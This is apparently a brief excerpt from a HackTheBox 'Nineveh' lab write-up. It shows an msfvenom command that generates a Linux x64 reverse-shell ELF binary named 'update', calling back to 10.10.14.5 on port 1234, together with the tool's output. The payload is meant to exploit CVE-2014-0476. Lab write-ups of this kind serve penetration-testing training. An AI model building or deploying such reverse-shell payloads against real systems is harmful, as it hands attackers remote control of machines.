msfvenom
┌──(kali㉿kali)-[~/archive/htb/labs/nineveh]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f elf -o update
[-] no platform was selected, choosing msf::Module::Platform::Linux from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 74 bytes
final size of elf file: 194 bytes
saved as: update
Generating a reverse shell payload with msfvenom. This binary will be used for exploiting CVE-2014-0476